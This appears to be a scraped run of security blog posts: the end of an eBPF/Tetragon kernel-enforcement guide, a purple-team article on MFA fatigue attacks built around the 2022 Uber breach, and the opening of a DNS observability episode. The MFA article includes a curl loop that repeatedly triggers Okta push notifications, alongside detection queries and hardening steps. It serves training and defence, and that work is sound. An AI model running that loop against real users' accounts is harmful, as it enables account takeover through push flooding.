kubectl exec -n kube-system \
  $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -c tetragon -- tetra getevents --event-types PROCESS_KPROBE | grep bprm

Sample audit event:

{
  "process_kprobe": {
    "process": {
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"},
      "binary": "/bin/sh",
      "pid": 18293
    },
    "function_name": "security_bprm_check",
    "action": "KPROBE_ACTION_POST"
  }
}

If my-app legitimately needs /bin/sh for its health check script, you'll see it here before you kill it. Refine the policy (for example, add a spec.podSelector whose matchExpressions exclude that deployment's labels, or adjust the binary list) and then switch to Sigkill.


⚠ Production Gotchas

Enforce mode kills anything the selector matches — including health checks and init containers. Most production containers have some shell usage: liveness probes that run sh -c, init containers that chmod files, entrypoint wrappers. Run in Post (audit) mode for at least 48 hours across a representative workload set before switching to Sigkill. Track all matched events and understand every process in the trace before enforcing.

LSM hooks fire in kernel context, so eBPF program complexity is limited. The verifier applies its complexity limits to every eBPF program, and hook programs run synchronously on the kernel's hot path, so policies with many conditions or complex map lookups may be rejected. Tetragon's policy engine compiles your TracingPolicy into eBPF that stays within verifier limits, but very complex matchArgs chains with many values can still hit them. Test with kubectl apply and check Tetragon pod logs for verifier rejection messages.

BPF_PROG_TYPE_LSM requires kernel 5.7+ and BPF LSM enabled. Check /sys/kernel/security/lsm for bpf in the list. EKS nodes running Amazon Linux 2 with kernel 5.10+ have BPF LSM available. GKE nodes with kernel 5.10+ on Container-Optimized OS have it enabled. Ubuntu 22.04 (kernel 5.15) builds BPF LSM into the kernel but leaves bpf out of its default active LSM list, so it has to be added through the lsm= boot parameter. Ubuntu 20.04's original 5.4 kernel predates BPF LSM; check your actual kernel version.
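The two preconditions in this gotcha can be checked together. A sketch (`bpf_lsm_ready` is a hypothetical helper) that takes the kernel release string and the contents of /sys/kernel/security/lsm as arguments, so the logic can be exercised away from a node:

```bash
#!/usr/bin/env bash
# Sketch: check kernel >= 5.7 and "bpf" in the active LSM list.
# Inputs are passed in so the logic can be exercised off-node.
bpf_lsm_ready() {
  local release="$1" lsm_list="$2" major minor
  IFS=. read -r major minor _ <<< "$release"
  minor="${minor%%[^0-9]*}"   # strip suffixes such as "-rc1"
  if (( major < 5 || (major == 5 && minor < 7) )); then
    echo "no: kernel $release is older than 5.7"
  elif [[ ",$lsm_list," != *",bpf,"* ]]; then
    echo "no: bpf not in active LSM list"
  else
    echo "yes"
  fi
}

bpf_lsm_ready 5.15.0-91-generic 'lockdown,capability,landlock,yama,apparmor'
# no: bpf not in active LSM list
```

On a node, call it as `bpf_lsm_ready "$(uname -r)" "$(cat /sys/kernel/security/lsm)"`.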

Policy scope: Tetragon TracingPolicies are cluster-wide by default. A policy without a podSelector applies to every process on every node, host processes included; note that matchNamespaces filters Linux namespaces (Pid, Mnt, Net and so on), not Kubernetes namespaces. Start with narrowly scoped policies during testing, and use namespaced TracingPolicy resources (TracingPolicyNamespaced, Tetragon 0.10+) to limit scope to a specific Kubernetes namespace.

bpf_send_signal(SIGKILL) vs returning an error code. Tetragon's Sigkill action uses bpf_send_signal() rather than making the hooked function return an error. The signal takes effect when the task heads back to userspace, so the kernel can finish the operation guarded by the hook before the process dies. Where the operation itself must not happen, pair Sigkill with the Override action, which forces an error return such as -EPERM (set via argError); this is the belt-and-suspenders approach. Tetragon's documentation describes which actions use which mechanism and which kernel functions support Override.


Quick Reference

What you want                  Command
Is BPF LSM enabled?            cat /sys/kernel/security/lsm (look for bpf)
What LSM programs are loaded?  bpftool prog list | grep lsm
What Tetragon policies exist?  kubectl get tracingpolicies -A
Audit events (before enforce)  tetra getevents --event-types PROCESS_KPROBE
Watch Tetragon enforcement     kubectl logs -n kube-system -l app.kubernetes.io/name=tetragon -c export-stdout -f
Test a policy safely           Set action: Post before action: Sigkill

Tetragon action  Effect
Post             Log event only (audit mode)
Sigkill          Send SIGKILL from kernel context
Override         Return custom error code to syscall caller
FollowFD         Track file descriptor for future hook correlation

LSM hook                   Protects
security_bprm_check        exec (block shell spawning)
security_inode_permission  file access (block reads/writes to sensitive paths)
security_socket_connect    outbound connections (block C2 connections)
security_capable           capability escalation (block CAP_SYS_ADMIN attempts)

Key Takeaways

  • When a Tetragon policy denies an operation at an LSM hook (the Override action), the operation fails with an error before the kernel performs it, so there is no detect-and-respond window
  • Falco, Datadog, and sidecar-based tools detect events after the syscall returns; this is architectural, not a product limitation — they operate at a layer where the operation has already occurred
  • BPF_PROG_TYPE_LSM attaches eBPF programs directly to Linux Security Module hooks. It needs kernel 5.7+ with BPF LSM enabled, so confirm that /sys/kernel/security/lsm lists bpf on your EKS/GKE node images
  • Tetragon sends SIGKILL from kernel context using bpf_send_signal() — not from a userspace agent polling an audit log
  • Always run Tetragon policies in Post (audit) mode for 48+ hours before switching to Sigkill — legitimate workloads trigger many of the same LSM hooks that attacks use
  • The combination of kprobe (rich context: pod name, namespace, process tree) and LSM (enforcement) gives Tetragon context-aware kernel enforcement that static profiles (AppArmor, seccomp) cannot provide dynamically

What’s Next

LSM hooks prevent operations in the moment. But after an incident — when enforcement failed, or when you’re doing post-hoc forensics — the question changes: what did this process spawn, what files did it touch, what connections did it make, and in what order? Answering that from logs alone is guesswork. Answering it from kernel-level process lineage is reconstruction.

EP13 covers how eBPF kprobe hooks on fork and exec build a complete, tamper-resistant process tree. Even after the attacker’s process has exited, the record remains — in kernel maps, exported to a persistent store, tied to the pod that ran it.

Next: process lineage with eBPF — reconstructing what happened after the fact

Get EP13 in your inbox when it publishes → linuxcent.com/subscribe

MFA Fatigue Attacks: How Uber Got Breached and How to Stop It

Reading Time: 10 minutes

What is purple team security · OWASP Top 10 mapped to cloud infrastructure · Cloud security breaches 2020–2025 · Broken access control in AWS · MFA fatigue attacks


TL;DR

  • An MFA fatigue attack exploits push-notification MFA (Duo, Okta Verify, Microsoft Authenticator) by flooding a user with push requests until they accept one — either out of exhaustion or after social engineering
  • Uber (September 2022): contractor credentials purchased on a criminal marketplace → repeated Duo push notifications → WhatsApp social engineering → push accepted → admin PAM credentials found on internal file share → full access to AWS, GCP, Slack, HackerOne
  • The attack works because push MFA creates a UX habit: “tap accept” is a trained response, not a decision
  • Detection: multiple MFA failures followed by a single success in a short window — Okta System Log, Azure AD Sign-in Log, AWS CloudTrail
  • The structural fix is replacing push MFA with phishing-resistant FIDO2 hardware keys — not security awareness training, not more push notifications, not “number matching” alone
  • Okta (October 2023): support system breach exposed session tokens → attackers bypassed MFA entirely by using stolen session context

OWASP Mapping: A07 Identification and Authentication Failures. The Uber breach is the defining infrastructure example. Okta demonstrates session token theft as a related A07 variant.


The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│                    MFA FATIGUE ATTACK ANATOMY                       │
│                                                                     │
│   STEP 1: OBTAIN CREDENTIALS                                        │
│   Attacker ──── phish / buy on market ──────▶ username + password  │
│                                                                     │
│   STEP 2: TRIGGER MFA FLOOD                                         │
│   Attacker ──── repeated login attempts ────▶ Push #1 → User: NO   │
│                                               Push #2 → User: NO   │
│                                               Push #3 → User: NO   │
│                                               Push #4 → User: ???   │
│                                                                     │
│   STEP 3: SOCIAL ENGINEERING LAYER                                  │
│   Attacker ──── "Hi, I'm from IT support.                           │
│                  Please accept the next push."                      │
│                                               Push #4 → User: YES  │
│                                                                     │
│   STEP 4: ACCESS                                                    │
│   Attacker ──── authenticated session ──────▶ Internal network      │
│                                               Enumerate shares      │
│                                               Find next credential  │
│                                                                     │
│   ═══════════════════════════════════════════════════════           │
│   WHY TRAINING DOESN'T HELP:                                        │
│   Push MFA trains users to tap accept. The attacker exploits        │
│   the trained behavior. Education competes with habit.              │
│                                                                     │
│   WHY HARDWARE KEYS DO:                                             │
│   FIDO2 requires physical presence. WhatsApp message                │
│   cannot accept a hardware key challenge.                           │
└─────────────────────────────────────────────────────────────────────┘

An MFA fatigue attack is how you bypass multi-factor authentication without breaking encryption or stealing the MFA seed — you exploit the user’s psychology and the UX of push-notification systems. The attacker knows the password. The only thing standing between them and access is the user’s willingness to tap “deny” indefinitely.


The Uber Breach: Anatomy Minute by Minute

September 15, 2022. The attacker’s capabilities: a purchased credential set for an Uber contractor account, a phone number, and patience.

The credential acquisition: Uber contractor credentials were available on criminal marketplaces. The attacker obtained a valid username and password for a contractor's Uber corporate account.

The MFA flood:

The contractor’s account had Duo push-based MFA enrolled. The attacker initiated login attempts repeatedly, triggering a sequence of Duo push notifications to the contractor’s phone. The contractor rejected three or four of them. At this point, most attacks would stop — but the attacker added a social engineering layer.

The WhatsApp message:

The attacker sent a WhatsApp message to the contractor’s number, claiming to be from Uber IT support:

“Hi, this is the Uber IT support team. We’re seeing some issues with your account and need you to approve the next Duo notification to verify your identity.”

The contractor accepted the next push notification.

Post-authentication enumeration:

With an authenticated session, the attacker accessed Uber’s internal network. On an internal network share accessible to contractors, they found a PowerShell script. In that script: hardcoded Thycotic admin credentials. Thycotic is a Privileged Access Management (PAM) system — it stores credentials for privileged accounts across an organization.

The blast radius:

With Thycotic admin access, the attacker retrieved credentials for:
– AWS IAM accounts
– GCP service accounts
– Google Workspace admin
– VMware vSphere
– Slack workspace admin
– HackerOne bug bounty program admin (including details of open security reports)

The entire Uber infrastructure was accessible from one contractor’s push notification acceptance.

What the logs would show (an illustrative reconstruction, not Uber's published logs):

2022-09-15T02:17:00Z  [Duo] <contractor>  action=push_sent  result=rejected
2022-09-15T02:17:45Z  [Duo] <contractor>  action=push_sent  result=rejected
2022-09-15T02:18:30Z  [Duo] <contractor>  action=push_sent  result=rejected
2022-09-15T02:19:15Z  [Duo] <contractor>  action=push_sent  result=rejected
2022-09-15T02:22:00Z  [Duo] <contractor>  action=push_sent  result=approved
2022-09-15T02:22:05Z  [VPN] <contractor>  connection=established  ip=<attacker>

Four rejections followed by one approval in a five-minute window. This is a detectable pattern — but only if someone is looking for it.
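The pattern in that excerpt is easy to express in code. This is a minimal sketch. It assumes events have already been reduced to (timestamp, user, result) tuples, using the "rejected"/"approved" values from the illustrative log. The thresholds are starting points, not tuned values.

```python
# Sketch: flag an approval that follows N or more rejected pushes within a time window.
# Input: (iso_timestamp, user, result) tuples; field values mirror the log excerpt above.
from collections import defaultdict
from datetime import datetime, timedelta


def parse_ts(ts: str) -> datetime:
    # fromisoformat() before Python 3.11 does not accept a trailing "Z"
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def find_fatigue(events, min_rejections=3, window=timedelta(minutes=10)):
    """Return (user, rejections_in_window, approval_time) for each suspicious approval."""
    per_user = defaultdict(list)
    for ts, user, result in events:
        per_user[user].append((parse_ts(ts), result))

    hits = []
    for user, items in per_user.items():
        rejections = []
        for when, result in sorted(items):
            if result == "rejected":
                rejections.append(when)
            elif result == "approved":
                recent = [r for r in rejections if when - r <= window]
                if len(recent) >= min_rejections:
                    hits.append((user, len(recent), when))
                rejections = []  # an approval ends the sequence
    return hits
```

Against the five Duo lines above, this reports one hit with four rejections in the window. Narrowing the window to three minutes leaves only the 02:19:15 rejection in range, so nothing is flagged. That is why the window size matters as much as the count.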


Red Phase: Simulating MFA Fatigue

What the Attack Looks Like in Tooling

MFA fatigue attacks need no special tooling. An attacker with valid credentials who knows which MFA system the target uses simply keeps logging in, by hand or with a trivial script. What can be simulated:

Option 1: Repeated legitimate login attempts (test account only)

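# DO NOT run against production accounts or accounts you don't own

# Okta classic Authentication API (test environment only; Identity Engine orgs may restrict /api/v1/authn)
TEST_USERNAME="<test-user-email>"   # replace with your test account
TEST_PASSWORD="TestPassword123!"
OKTA_DOMAIN="your-org.okta.com"

for i in {1..5}; do
  echo "Attempt $i at $(date +%T)"
  # Primary authentication: a correct password returns status MFA_REQUIRED
  response=$(curl -s -X POST \
    "https://${OKTA_DOMAIN}/api/v1/authn" \
    -H "Accept: application/json" \
    -H "Content-Type: application/json" \
    -d "{\"username\": \"${TEST_USERNAME}\", \"password\": \"${TEST_PASSWORD}\"}")

  status=$(echo "$response" | jq -r '.status')
  echo "  Status: $status"

  if [ "$status" = "MFA_REQUIRED" ]; then
    state_token=$(echo "$response" | jq -r '.stateToken')
    factor_id=$(echo "$response" | jq -r '._embedded.factors[] | select(.factorType == "push") | .id')

    # Verifying the push factor is the call that actually sends the notification
    verify=$(curl -s -X POST \
      "https://${OKTA_DOMAIN}/api/v1/authn/factors/${factor_id}/verify" \
      -H "Accept: application/json" \
      -H "Content-Type: application/json" \
      -d "{\"stateToken\": \"${state_token}\"}")
    echo "  Push sent to factor $factor_id: $(echo "$verify" | jq -r '.status') / $(echo "$verify" | jq -r '.factorResult')"

    # An attacker would now poll the verify endpoint until factorResult changes from WAITING
    echo "  Waiting 10 seconds for user to respond..."
    sleep 10
  fi

  sleep 30  # Wait between attempts to avoid rate limiting
done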

Option 2: Tabletop exercise (no credentials required)

For organizations that cannot run live credential tests, the tabletop simulation maps the attack against your specific IdP logs. Pull 30 days of authentication logs and look for the pattern:

# Okta System Log: MFA outcomes per user over the last 30 days
# (returns the first page only; follow the Link: rel="next" header to paginate)
curl -s -G -H "Authorization: SSWS ${OKTA_API_TOKEN}" -H "Accept: application/json" \
  "https://your-org.okta.com/api/v1/logs" \
  --data-urlencode 'filter=eventType eq "user.authentication.auth_via_mfa"' \
  --data-urlencode "since=$(date -u -d '30 days ago' +%Y-%m-%dT%H:%M:%SZ)" \
  --data-urlencode 'limit=1000' | \
  jq '
    group_by(.actor.id) |
    map({
      user: .[0].actor.displayName,
      total: length,
      failures: [.[] | select(.outcome.result == "FAILURE")] | length,
      successes: [.[] | select(.outcome.result == "SUCCESS")] | length
    }) |
    sort_by(.failures) |
    reverse |
    .[0:20]
  '

Users with high failure counts followed by eventual success are the fatigue attack pattern. Some will be legitimate (user locked themselves out, then called IT). The ones to investigate are those where the failure-to-success sequence happened in a short window (under 30 minutes) and from an unusual IP.


Blue Phase: Detection Across Identity Providers

Okta: Push Notification Flood

# Okta System Log: detect repeated MFA failures from the same user
# Query for: 3 or more failures by the same user in the same 10-minute bucket
# (.published[0:15] is "YYYY-MM-DDTHH:M", which truncates to a fixed 10-minute bucket)
curl -s -G -H "Authorization: SSWS ${OKTA_API_TOKEN}" -H "Accept: application/json" \
  "https://your-org.okta.com/api/v1/logs" \
  --data-urlencode 'filter=eventType eq "user.authentication.auth_via_mfa" and outcome.result eq "FAILURE"' \
  --data-urlencode "since=$(date -u -d '24 hours ago' +%Y-%m-%dT%H:%M:%SZ)" \
  --data-urlencode 'limit=1000' | \
  jq '
    group_by(.actor.id, .published[0:15]) |
    map(select(length >= 3)) |
    map({
      user: .[0].actor.displayName,
      window_start: (.[0].published[0:15] + "0"),
      failure_count: length,
      ips: [.[].client.ipAddress] | unique
    })
  '

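Azure AD: Sign-in Logs

# Azure AD (Entra ID): MFA denials in the last 24 hours, from the Microsoft Graph sign-in log
# (az monitor activity-log covers Azure Resource Manager operations, not sign-ins)
# Requires AuditLog.Read.All; error 500121 = authentication failed during strong authentication
since=$(date -u -d '24 hours ago' +%Y-%m-%dT%H:%M:%SZ)
az rest --method get \
  --url "https://graph.microsoft.com/v1.0/auditLogs/signIns?\$filter=createdDateTime%20ge%20${since}" \
  --query 'value[?status.errorCode==`500121`].{user:userPrincipalName,time:createdDateTime,ip:ipAddress}' \
  --output table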

In Microsoft Sentinel, the detection rule for MFA fatigue:

// Azure AD MFA fatigue detection (Sentinel KQL)
// 500121 = MFA failed or denied. Counting every non-zero ResultType would also count
// routine "MFA required" interrupts such as 50074. Successes must stay in scope to be counted.
SigninLogs
| where TimeGenerated > ago(24h)
| where AuthenticationRequirement == "multiFactorAuthentication"
| summarize
    FailureCount = countif(ResultType == "500121"),
    SuccessCount = countif(ResultType == "0"),
    IPs = make_set(IPAddress),
    StartTime = min(TimeGenerated),
    EndTime = max(TimeGenerated)
    by UserPrincipalName, bin(TimeGenerated, 30m)
| where FailureCount >= 3 and SuccessCount >= 1
| project UserPrincipalName, FailureCount, SuccessCount, IPs, StartTime, EndTime
| order by FailureCount desc

AWS CloudTrail: Console Session After MFA Flood

If your organization uses AWS SSO (IAM Identity Center) with an external IdP, the CloudTrail event that matters is the console login event immediately following the MFA success:

# List console logins with source IP and MFA flag; review the output for unfamiliar IPs
aws cloudtrail lookup-events \
  --lookup-attributes AttributeKey=EventName,AttributeValue=ConsoleLogin \
  --start-time "$(date -d '24 hours ago' --iso-8601=seconds)" \
  --query 'Events[].{Time:EventTime,User:Username,Raw:CloudTrailEvent}' \
  --output json | \
  jq '.[] | (.Raw | fromjson) as $e | {
    time: .Time,
    user: .User,
    ip: $e.sourceIPAddress,
    mfa: $e.additionalEventData.MFAUsed
  }'

What a GuardDuty Alert Looks Like for This Attack

GuardDuty does not generate a specific finding for MFA fatigue (it does not have visibility into IdP logs). What it may catch downstream:

  • UnauthorizedAccess:IAMUser/ConsoleLoginSuccess.B — console login from unusual geographic location or Tor exit node
  • Discovery:IAMUser/AnomalousBehavior — if the attacker begins enumerating IAM after console access

The gap: GuardDuty’s behavioral analysis is per-account. If the attacker logs in using valid credentials and MFA, GuardDuty may not flag the initial access — only downstream actions that deviate from baseline.


Purple Phase: The Structural Fix

Fix 1: Replace Push MFA with FIDO2 Hardware Keys (for Tier-0 Accounts)

This is the only structural fix. MFA fatigue attacks work because push notifications can be approved by a human who is socially engineered. FIDO2 hardware keys (YubiKey, Google Titan, etc.) require physical possession of the key and a user gesture (touch). A WhatsApp message cannot substitute for physical key presence.
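Physical presence is one half of why this works. The other half is origin binding. The browser records the origin it is actually talking to in the client data that the authenticator's signature covers, and the relying party rejects any mismatch. As a result, a login cannot be relayed through a look-alike site. This is a minimal sketch of those relying-party checks, following the WebAuthn assertion-verification steps. It deliberately omits the signature check against the stored public key, and the domain names are placeholders.

```python
# Sketch of the relying-party checks that make FIDO2/WebAuthn phishing-resistant.
# Signature verification against the stored public key is deliberately omitted.
import base64
import hashlib
import json

UP_FLAG = 0x01  # "user present": the authenticator registered a physical touch


def b64url_decode(data: str) -> bytes:
    return base64.urlsafe_b64decode(data + "=" * (-len(data) % 4))


def check_assertion(client_data_b64: str, auth_data: bytes,
                    expected_challenge: str, expected_origin: str, rp_id: str) -> list:
    """Return the names of failed checks (an empty list means these checks passed)."""
    if len(auth_data) < 37:  # rpIdHash (32) + flags (1) + signCount (4)
        return ["authenticatorData-length"]
    failures = []
    client_data = json.loads(b64url_decode(client_data_b64))
    if client_data.get("type") != "webauthn.get":
        failures.append("type")
    if client_data.get("challenge") != expected_challenge:
        failures.append("challenge")
    # The browser writes the origin it actually connected to; a phishing domain differs
    if client_data.get("origin") != expected_origin:
        failures.append("origin")
    if auth_data[:32] != hashlib.sha256(rp_id.encode()).digest():
        failures.append("rpIdHash")
    if not auth_data[32] & UP_FLAG:
        failures.append("user-present")
    return failures
```

In practice the authenticator would not even offer a credential scoped to the real domain on a phishing domain. The origin check is the server-side backstop. Neither step can be talked past over WhatsApp.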

# Okta: Require hardware key MFA for admin accounts
# (done via Okta Admin Console → Security → Authentication Policies)
# API example: this call creates only the policy container. The rule that actually
# requires a phishing-resistant (FIDO2) authenticator is added separately, in the
# Admin Console or via /api/v1/policies/{policyId}/rules, and the policy is then
# assigned to the admin applications.
curl -X POST \
  "https://your-org.okta.com/api/v1/policies" \
  -H "Authorization: SSWS ${OKTA_API_TOKEN}" \
  -H "Accept: application/json" \
  -H "Content-Type: application/json" \
  -d '{
    "name": "Admin Hardware Key Policy",
    "type": "ACCESS_POLICY",
    "status": "ACTIVE",
    "description": "Requires FIDO2 hardware key for admin access"
  }'

Phasing hardware keys across an organization:

Tier                  Examples                                         Timeline
Tier 0 (immediate)    Cloud admin, IAM admin, Okta admin, DNS admin    Week 1
Tier 1 (30 days)      All engineers with production access             Month 1
Tier 2 (90 days)      All employees with SSO access                    Month 3
Contractors           Scope-limited access, enforce at boundary        Immediate

Fix 2: Number Matching (Intermediate Mitigation)

If hardware keys cannot be deployed immediately, number matching significantly reduces MFA fatigue effectiveness. Instead of a simple “approve/deny” push, the user must match a number shown on the login screen to a number shown in the authenticator app. This breaks the fatigue pattern — the attacker cannot trigger an approval without the user actively entering the correct number.
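The difference from a plain push is a single comparison. This is a minimal sketch of the server-side check. It assumes a two-digit number typed into the app; vendors differ in how the number is shown and entered. The function names are hypothetical.

```python
# Sketch of number matching: the push is accepted only when the number typed into
# the authenticator app equals the number shown on the login screen.
import hmac
import secrets


def new_challenge() -> str:
    """Two-digit number (10-99) displayed on the login screen."""
    return str(secrets.randbelow(90) + 10)


def verify_push(shown_on_screen: str, typed_in_app: str) -> bool:
    if not typed_in_app:
        return False  # a bare "Approve" tap carries no number and never passes
    # Constant-time comparison, the usual habit when comparing challenge values
    return hmac.compare_digest(shown_on_screen.encode(), typed_in_app.encode())
```

The number only appears on the attacker's login screen. A fatigued user tapping Approve on their phone therefore cannot complete the login. The attacker has to get the user to enter the number from the attacker's session, which is exactly the gap a real-time relay exploits.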

# Duo: Enable number matching (Duo calls this Verified Duo Push)
# Duo Admin Console → Policies → Duo Push Number Matching: Required

# Microsoft Authenticator: Enable number matching
# Azure AD → Security → Authentication methods → Microsoft Authenticator
# Enable: "Require number matching for push notifications"
# (Microsoft has enforced number matching for all Authenticator push notifications since May 2023)

# Okta Verify: Enable number challenge for push
# Okta Admin → Security → Multifactor → Okta Verify → Enable "Number Challenge"

Fix 3: Detect and Block — Automated Response to Fatigue Pattern

#!/usr/bin/env python3
# Purple Team EP05: MFA Fatigue Auto-Response
# Monitors the Okta System Log, alerts via SNS on the fatigue pattern, and
# optionally suspends the affected user (AUTO_SUSPEND)
# Run as a Lambda function or scheduled script in your SIEM pipeline

from datetime import datetime, timedelta, timezone

import boto3
import requests

OKTA_DOMAIN = "your-org.okta.com"
OKTA_TOKEN = "your-okta-api-token"  # use Secrets Manager in production
SNS_TOPIC_ARN = "arn:aws:sns:us-east-1:123456789012:security-alerts"
AUTO_SUSPEND = False  # enable only after the detection has been tuned
HEADERS = {"Authorization": f"SSWS {OKTA_TOKEN}", "Accept": "application/json"}


def get_recent_mfa_events(hours=1):
    since = (datetime.now(timezone.utc) - timedelta(hours=hours)).strftime("%Y-%m-%dT%H:%M:%SZ")
    params = {
        "filter": 'eventType eq "user.authentication.auth_via_mfa"',
        "since": since,
        "limit": 1000,  # first page only; follow the Link header to paginate
    }
    response = requests.get(f"https://{OKTA_DOMAIN}/api/v1/logs",
                            params=params, headers=HEADERS, timeout=30)
    response.raise_for_status()
    return response.json()


def parse_ts(ts):
    # Okta timestamps look like "2022-09-15T02:17:00.000Z"
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def detect_fatigue_pattern(events, failure_threshold=3, window_minutes=10):
    window = timedelta(minutes=window_minutes)
    user_events = {}
    for event in events:
        actor = event["actor"]
        entry = user_events.setdefault(actor["id"], {"name": actor["displayName"], "events": []})
        entry["events"].append((parse_ts(event["published"]), event["outcome"]["result"]))

    fatigue_users = []
    for user_id, data in user_events.items():
        failures = []
        for ts, result in sorted(data["events"]):
            if result == "FAILURE":
                failures.append(ts)
            elif result == "SUCCESS":
                # Count only failures inside the window that ends at this success
                recent = [f for f in failures if ts - f <= window]
                if len(recent) >= failure_threshold:
                    fatigue_users.append({
                        "user_id": user_id,
                        "user_name": data["name"],
                        "failure_count": len(recent),
                        "success_after_failures": True,
                    })
                    break
                failures = []  # a success with too few prior failures resets the sequence
    return fatigue_users


def alert_security_team(fatigue_users):
    message = f"MFA FATIGUE ALERT: {len(fatigue_users)} user(s) detected:\n"
    for user in fatigue_users:
        message += f"  - {user['user_name']}: {user['failure_count']} failures then success\n"
    boto3.client("sns").publish(
        TopicArn=SNS_TOPIC_ARN,
        Subject="Purple Team: MFA Fatigue Attack Detected",
        Message=message,
    )


def suspend_user(user_id):
    # Okta Users API lifecycle operation: a suspended user cannot sign in until unsuspended
    url = f"https://{OKTA_DOMAIN}/api/v1/users/{user_id}/lifecycle/suspend"
    requests.post(url, headers=HEADERS, timeout=30).raise_for_status()


def lambda_handler(event, context):
    events = get_recent_mfa_events(hours=1)
    fatigue_users = detect_fatigue_pattern(events)
    if fatigue_users:
        alert_security_team(fatigue_users)
        if AUTO_SUSPEND:
            for user in fatigue_users:
                suspend_user(user["user_id"])
    return {"fatigue_users_detected": len(fatigue_users)}

Fix 4: Privileged Access Workstations and Session Recording

The Uber breach succeeded because the attacker found hardcoded credentials on a file share accessible to contractors. Once identity is hardened, the next fix is to find and remove credentials stored in scripts and files:

# Ensure no scripts or configuration files contain credentials
# Run TruffleHog against your internal repositories and file shares
trufflehog filesystem /path/to/internal/share \
  --json \
  --include-detectors=all \
  2>/dev/null | \
  jq '{file: .SourceMetadata.Data.Filesystem.file, detector: .DetectorName, verified: .Verified}'

Run This in Your Own Environment: MFA Audit

#!/bin/bash
# Purple Team EP05: MFA Coverage Audit
# Checks AWS IAM users for console access without MFA and for stale access keys (A07 exposure)
# Credential report columns used: $1 user, $4 password_enabled, $8 mfa_active,
# $9 access_key_1_active, $10 access_key_1_last_rotated (key 2 is not checked here)

echo "=== AWS: Console Users Without MFA ==="
# Report generation is asynchronous; poll until it is ready
until [ "$(aws iam generate-credential-report --query State --output text)" = "COMPLETE" ]; do
  sleep 2
done
report=$(aws iam get-credential-report --query 'Content' --output text | base64 -d)

echo "$report" | awk -F',' 'NR>1 && $4=="true" && $8=="false" {
    print "  USER: " $1 " | Console: " $4 " | MFA: " $8
  }'

echo ""
echo "=== AWS: IAM Users with Access Keys Older Than 90 Days (rotation risk) ==="
now=$(date +%s)
echo "$report" | awk -F',' -v now="$now" 'NR>1 && $9=="true" && $10!="N/A" {
    cmd = "date -d " $10 " +%s"
    cmd | getline key_date; close(cmd)
    age_days = int((now - key_date) / 86400)
    if (age_days > 90) print "  USER: " $1 " | KEY AGE: " age_days " days"
  }'

echo ""
echo "=== RECOMMENDATION ==="
echo "  - Any console user without MFA = immediate A07 exposure"
echo "  - For accounts with Okta/Azure AD: run IdP-specific audit above"
echo "  - Hardware FIDO2 keys required for all admin accounts"

⚠ Common Mistakes When Responding to MFA Fatigue Risk

Mandating security training as the primary response. The Uber contractor was experienced. Training did not fail — the attacker exploited a social engineering vector that training cannot structurally prevent. Hardware keys remove the social engineering surface entirely.

Implementing “number matching” and considering MFA fatigue solved. Number matching makes fatigue attacks harder, not impossible. A sophisticated attacker can relay the number in real time via voice call (“what number do you see on your screen?”). It buys time; it does not eliminate the attack class.

Requiring MFA for employees but not contractors. The Uber breach was a contractor account. Contractor access policies tend to have looser MFA requirements because contractors often resist corporate MDM on personal devices. The solution is to scope contractor access tightly and require hardware key MFA at the access boundary, not push MFA.

Not monitoring for the failure-then-success pattern. The Okta System Log, Azure AD Sign-in Logs, and Duo Admin Panel all have the data to detect MFA fatigue in real time. Most organizations generate these logs but do not have detection rules for the pattern. The detection is straightforward; the investment is adding the rule to your SIEM.

Forgetting session tokens. The October 2023 Okta support-system breach was not MFA fatigue; it was session token theft. An attacker who can steal a valid session token does not need to beat MFA at all. Session token lifetime, storage security, and re-authentication requirements for sensitive operations are separate controls that address this variant.
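The re-authentication control can be sketched as a per-operation limit on how long ago the user last authenticated interactively. A stolen session token keeps working for low-risk reads. A sensitive action, however, demands a fresh authentication ceremony that the token alone cannot satisfy. This is a minimal sketch: the operation names and limits are hypothetical, and auth_time is assumed to come from an OIDC ID token's claim of that name.

```python
# Sketch: per-operation re-authentication based on session age.
# auth_time mirrors the OIDC ID-token claim (seconds since the epoch);
# the operation names and limits below are hypothetical policy values.
import time
from typing import Optional

MAX_AUTH_AGE_SECONDS = {
    "read_dashboard": 8 * 3600,
    "create_iam_user": 15 * 60,
    "export_secrets": 5 * 60,
}


def needs_reauth(operation: str, auth_time: float, now: Optional[float] = None) -> bool:
    """True when the last interactive authentication is too old for this operation."""
    now = time.time() if now is None else now
    limit = MAX_AUTH_AGE_SECONDS.get(operation)
    if limit is None:
        return True  # unknown operations fail closed
    return now - auth_time > limit
```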


Quick Reference

Attack Variant              Mechanism                                                    Structural Fix
Push notification flood     Attacker initiates logins repeatedly until user accepts      FIDO2 hardware key MFA
Social engineering layer    Attacker contacts user claiming to be IT support             Hardware key (physical presence required)
Session token theft         Steal valid session without needing MFA at all               Short session lifetime + re-auth for sensitive ops
Number matching bypass      Relay number via voice call in real time                     Hardware key (no relay possible)
SIM swap                    Port victim’s phone number to attacker’s SIM; receive OTP    Hardware key (phone-independent)

Key Takeaways

  • An MFA fatigue attack exploits push notification UX — training users to tap “deny” competes with a trained habit of tapping “accept”; hardware keys eliminate the attack surface by requiring physical presence
  • The Uber breach (2022) was MFA fatigue + hardcoded credentials in a file share — two OWASP categories chained (A07 + A02)
  • Detection is straightforward: multiple MFA failures followed by a success in a short window — this pattern exists in every IdP’s logs; adding the detection rule is the work
  • Number matching is a meaningful intermediate mitigation; it is not a structural fix
  • Hardware FIDO2 keys are the structural fix — they require physical presence and are phishing-resistant by design
  • Tier-0 accounts (cloud admin, IAM admin, Okta admin) cannot wait for the phased rollout — hardware keys on day one
  • Session token theft (CircleCI, Okta support breach) is a related A07 variant: even perfect MFA is bypassed if a valid session token is exfiltrated

What’s Next

EP06 covers CI/CD secrets exposure: how pipeline breaches work, why storing credentials in environment variables is structurally dangerous, and how the CircleCI breach exposed secrets that teams thought were safely stored. The structural answer is OIDC workload identity (IAM EP07). Short-lived credentials are minted only at the moment they're needed and expire soon after, so no long-lived secret sits in the pipeline waiting to be stolen.

Get EP06 in your inbox when it publishes → subscribe at linuxcent.com

DNS at the Kernel Level — What Your Pods Are Actually Resolving

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 11
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace · Network Flow Observability · DNS Observability


Architecture Overview

